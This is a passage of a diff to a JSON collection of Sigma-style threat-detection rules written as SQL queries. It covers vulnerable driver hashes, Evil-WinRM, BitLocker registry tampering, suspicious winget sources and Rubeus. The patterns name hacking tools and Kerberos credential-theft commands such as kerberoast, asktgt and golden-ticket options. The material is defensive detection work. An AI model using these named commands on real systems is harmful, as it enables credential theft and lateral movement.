'1E8B0C1966E566A523D652E00F7727D8B0663F1DFDCE3B9A09B9ADFAEF48D8EE', '2BBE65CBEC3BB069E92233924F7EE1F95FFA16173FCEB932C34F68D862781250', '30706F110725199E338E9CC1C940D9A644D19A14F0EB8847712CBA4CACDA67AB', '3124B0411B8077605DB2A9B7909D8240E0D554496600E2706E531C93C931E1B5', '38FA0C663C8689048726666F1C5E019FEAA9DA8278F1DF6FF62DA33961891D2A', '39CFDE7D401EFCE4F550E0A9461F5FC4D71FA07235E1336E4F0B4882BD76550E', '3D9E83B189FCF5C3541C62D1F54A0DA0A4E5B62C3243D2989AFC46644056C8E3', '3F2FDA9A7A9C57B7138687BBCE49A2E156D6095DDDABB3454EA09737E02C3FA5', '47F0CDAA2359A63AD1389EF4A635F1F6EEE1F63BDF6EF177F114BDCDADC2E005', '50D5EAA168C077CE5B7F15B3F2C43BD2B86B07B1E926C1B332F8CB13BD2E0793', '56A3C9AC137D862A85B4004F043D46542A1B61C6ACB438098A9640469E2D80E7', '591BD5E92DFA0117B3DAA29750E73E2DB25BAA717C31217539D30FFB1F7F3A52', '5D530E111400785D183057113D70623E17AF32931668AB7C7FC826F0FD4F91A3', '6F1FF29E2E710F6D064DC74E8E011331D807C32CC2A622CBE507FD4B4D43F8F4', '79E2D37632C417138970B4FEBA91B7E10C2EA251C5EFE3D1FC6FA0190F176B57', '85866E8C25D82C1EC91D7A8076C7D073CCCF421CF57D9C83D80D63943A4EDD94', '89B0017BC30CC026E32B758C66A1AF88BD54C6A78E11EC2908FF854E00AC46BE', '9254F012009D55F555418FF85F7D93B184AB7CB0E37AECDFDAB62CFE94DEA96B', '984A77E5424C6D099051441005F2938AE92B31B5AD8F6521C6B001932862ADD7', '98B734DDA78C16EBCAA4AFEB31007926542B63B2F163B2F733FA0D00DBB344D8', '99F4994A0E5BD1BF6E3F637D3225C69FF4CD620557E23637533E7F18D7D6CBA1', '9C10E2EC4F9EF591415F9A784B93DC9C9CDAFA7C69602C0DC860C5B62222E449', 'A961F5939088238D76757669A9A81905E33F247C9C635B908DAAC146AE063499', 'A9706E320179993DADE519A83061477ACE195DAA1B788662825484813001F526', 'B7A20B5F15E1871B392782C46EBCC897929443D82073EE4DCB3874B6A5976B5D', 'CC586254E9E89E88334ADEE44E332166119307E79C2F18F6C2AB90CE8BA7FC9B', 'CD4A249C3EF65AF285D0F8F30A8A96E83688486AAB515836318A2559757A89BB', 'CF4B5FA853CE809F1924DF3A3AE3C4E191878C4EA5248D8785DC7E51807A512B', 'D0BD1AE72AEB5F3EABF1531A635F990E5EAAE7FDD560342F915F723766C80889', 'D8B58F6A89A7618558E37AFC360CD772B6731E3BA367F8D58734ECEE2244A530', 'D92EAB70BCECE4432258C9C9A914483A2267F6AB5CE2630048D3A99E8CB1B482', 'E005E8D183E853A27AD3BB56F25489F369C11B0D47E3D4095AAD9291B3343BF1', 'E68D453D333854787F8470C8BAEF3E0D082F26DF5AA19C0493898BCF3401E39A', 'E83908EBA2501A00EF9E74E7D1C8B4FF1279F1CD6051707FD51824F87E4378FA', 'EF86C4E5EE1DBC4F81CD864E8CD2F4A2A85EE4475B9A9AB698A4AE1CC71FBEB0', 'F088B2BA27DACD5C28F8EE428F1350DCA4BC7C6606309C287C801B2E1DA1A53D', 'FD8669794C67B396C12FC5F08E9C004FDF851A82FAF302846878173E4FBECB03', '91314768DA140999E682D2A290D48B78BB25A35525EA12C1B1F9634D14602B2C', 'F0605DDA1DEF240DC7E14EFA73927D6C6D89988C01EA8647B671667B2B167008', '6CB51AE871FBD5D07C5AAD6FF8EEA43D34063089528603CA9CEB8B4F52F68DDC', 'DB2A9247177E8CDD50FE9433D066B86FFD2A84301AA6B2EB60F361CFFF077004', '7EC93F34EB323823EB199FBF8D06219086D517D0E8F4B9E348D7AFD41EC9FD5D', '7049F3C939EFE76A5556C2A2C04386DB51DAF61D56B679F4868BB0983C996EBB', '7877C1B0E7429453B750218CA491C2825DAE684AD9616642EFF7B41715C70ACA', '159E7C5A12157AF92E0D14A0D3EA116F91C09E21A9831486E6DC592C93C10980', '3243AAB18E273A9B9C4280A57AECEF278E10BFFF19ABB260D7A7820E41739099', '7CFA5E10DFF8A99A5D544B011F676BC383991274C693E21E3AF40CF6982ADB8C', 'C9B49B52B493B53CD49C12C3FA9553E57C5394555B64E32D1208F5B96A5B8C6E', '3EC5AD51E6879464DFBCCB9F4ED76C6325056A42548D5994BA869DA9C4C039A8', '47EAEBC920CCF99E09FC9924FEB6B19B8A28589F52783327067C9B09754B5E84', '80599708ce61ec5d6dcfc5977208a2a0be2252820a88d9ba260d8cdf5dc7fbe4', '9091e044273ff624585235ac885eb2b05dfb12f3022dcf535b178ff1b2e012d1', '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1', '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d', '41cceace9751dce2b6ecaedc9a2d374fbb6458cf93b00a1dcd634ad0bc54ef89', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', '1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b', 'e6056443537d4d2314dabca1b9168f1eaaf17a14eb41f6f5741b6b82b3119790', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', '39937d239220c1b779d7d55613de2c0a48bd6e12e0214da4c65992b96cf591df', '7ed26a593524a2a92ffcfb075a42bb4fa4775ffbf83af98525244a4710886ead', 'aa717e9ab4d614497df19f602d289a6eddcdba8027c71bcc807780a219347d16', 'ff5f6048a3d6f6738b60e911e3876fcbdc9a02ec9862f909345c8a50fd4cc0a7', '952199C28332BC90CFD74530A77EE237967ED32B3C71322559C59F7A42187DC4', '9529EFB1837B1005E5E8F477773752078E0A46500C748BC30C9B5084D04082E6', 'A7B000ABBCC344444A9B00CFADE7AA22AB92CE0CADEC196C30EB1851AE4FA062', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', '01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', 'd205286bffdf09bc033c09e95c519c1c267b40c2ee8bab703c6a2d86741ccd3e', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', '2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d', 'f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0', 'a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', 'fc22977ff721b3d718b71c42440ee2d8a144f3fbc7755e4331ddd5bcc65158d2', 'ad40e6d0f77c0e579fb87c5106bf6de3d1a9f30ee2fbf8c9c011f377fa05f173', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', 'a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3', '1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', '32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993', '082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33', 'b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29', '3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838', '3c5bf92c26398695f9ced7ce647a7e9f6ddcc89eea66b45aa3607196a187431b', '478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82', '4ed2d2c1b00e87b926fb58b4ea43d2db35e5912975f4400aa7bd9f8c239d08b7', 'b205835b818d8a50903cf76936fcf8160060762725bd74a523320cfbd091c038', 'ab8f2217e59319b88080e052782e559a706fa4fb7b8b708f709ff3617124da89', '73327429c505d8c5fd690a8ec019ed4fd5a726b607cabe71509111c7bfe9fc7e', '87e38e7aeaaaa96efe1a74f59fca8371de93544b7af22862eb0e574cec49c7c3', '2270a8144dabaf159c2888519b11b61e5e13acdaa997820c09798137bded3dd6', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', 'e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf', '1dadd707c55413a16320dc70d2ca7784b94c6658331a753b3424ae696c5d93ea', 'd84e3e250a86227c64a96f6d5ac2b447674ba93d399160850acb2339da43eae5', '5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a', '0f726d8ce21c0c9e01ebe6b55913c519ad6086bcaec1a89f8308f3effacd435f', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '0e14a4401011a9f4e444028ac5b1595da34bbbf9af04a00670f15ff839734003', '26c86227d3f387897c1efd77dc711eef748eb90be84149cb306e3d4c45cc71c7', '42d926cfb3794f9b1e3cb397498696cb687f505e15feb9df11b419c49c9af498', '1684e24dae20ab83ab5462aa1ff6473110ec53f52a32cfb8c1fe95a2642c6d22', '9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '3a364a7a3f6c0f2f925a060e84fb18b16c118125165b5ea6c94363221dc1b6de', 'fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', '175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347', '8596ea3952d84eeef8f5dc5b0b83014feb101ec295b2d80910f21508a95aa026', '52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9', '32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', 'ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec', '771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', 'e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220', '1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b', '029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df', '1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557', 'c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522', 'a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512', '5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e', 'e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4', '7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230', '97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56', '8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f', '09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184', '2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d', '5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683', 'f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54', '2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b', '1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e', '84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42', '0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c', 'a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b', '4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219', '6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a', 'c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747', 'd3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34', '3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%~1.exe%' ESCAPE '\\' OR CommandLine LIKE '%~1.bat%' ESCAPE '\\' OR CommandLine LIKE '%~1.msi%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~1.dll%' ESCAPE '\\' OR CommandLine LIKE '%~1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~1.js%' ESCAPE '\\' OR CommandLine LIKE '%~1.hta%' ESCAPE '\\' OR CommandLine LIKE '%~2.exe%' ESCAPE '\\' OR CommandLine LIKE '%~2.bat%' ESCAPE '\\' OR CommandLine LIKE '%~2.msi%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~2.dll%' ESCAPE '\\' OR CommandLine LIKE '%~2.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~2.js%' ESCAPE '\\' OR CommandLine LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\xampp\\\\vcredist\\\\VCREDI~1.EXE%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_drivers.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_cli.yml" }, { - "title": "Vulnerable WinRing0 Driver Load", - "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", - "status": "experimental", - "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - WinRM Access Via Evil-WinRM", + "id": "a197e378-d31b-41c0-9635-cfdf1c1bb423", + "status": "test", + "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ruby.exe' ESCAPE '\\' AND CommandLine LIKE '%-i %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\')" ], - "filename": "driver_load_win_vuln_winring0_driver.yml" + "filename": "proc_creation_win_hktl_evil_winrm.yml" }, { - "title": "Usage Of Malicious POORTRY Signed Driver", - "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", + "title": "Suspicious Reg Add BitLocker", + "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", "status": "experimental", - "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1543", - "attack.t1068" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" ], - "filename": "driver_load_win_mal_poortry_driver.yml" + "filename": "proc_creation_win_reg_bitlocker.yml" }, { - "title": "Vulnerable GIGABYTE Driver Load", - "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", + "title": "Add Potential Suspicious New Download Source To Winget", + "id": "c15a46a0-07d4-4c87-b4b6-89207835a83b", "status": "experimental", - "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of winget to add new potentially suspicious download sources", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\') AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}')" ], - "filename": "driver_load_win_vuln_gigabyte_driver.yml" + "filename": "proc_creation_win_winget_add_susp_custom_source.yml" }, { - "title": "Suspicious Driver Load from Temp", - "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", - "status": "test", - "description": "Detects a driver load from a temporary directory", + "title": "HackTool - Rubeus Execution", + "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "status": "stable", + "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "There is a relevant set of false positives depending on applications in the environment" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '%asreproast %' ESCAPE '\\' OR CommandLine LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '%dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '%kerberoast %' ESCAPE '\\' OR CommandLine LIKE '%createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '%ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%/impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '%renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '%harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%hash /password:%' ESCAPE '\\' OR CommandLine LIKE '%golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE 